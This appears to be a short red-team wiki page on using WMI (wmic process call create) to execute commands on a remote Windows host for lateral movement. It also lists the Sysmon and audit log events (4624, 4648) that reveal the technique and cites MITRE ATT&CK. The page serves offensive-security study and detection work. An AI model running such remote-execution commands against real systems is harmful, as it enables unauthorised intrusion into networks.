WMI for Lateral Movement

Windows Management Instrumentation for code execution, lateral movement.

Execution

Spawning a new process on the target system 10.0.0.6 from another compromised system 10.0.0.2:

attacker@victim

wmic /node:10.0.0.6 /user:administrator process call create "cmd.exe /c calc"

Observations

Inspecting sysmon and windows audit logs, we can see 4648 logon events being logged on the source machine as well as processes being spawned by WmiPrvSe.exe on the target host:

Both on the host initiating the connection and on the host that is being logged on to, events 4624 and 4648 should be logged:

References

Windows Management Instrumentation, Technique T1047 - Enterprise | MITRE ATT&CK®

PreviousWinRS for Lateral Movement NextRDP Hijacking for Lateral Movement with tscon

Last updated 6 years ago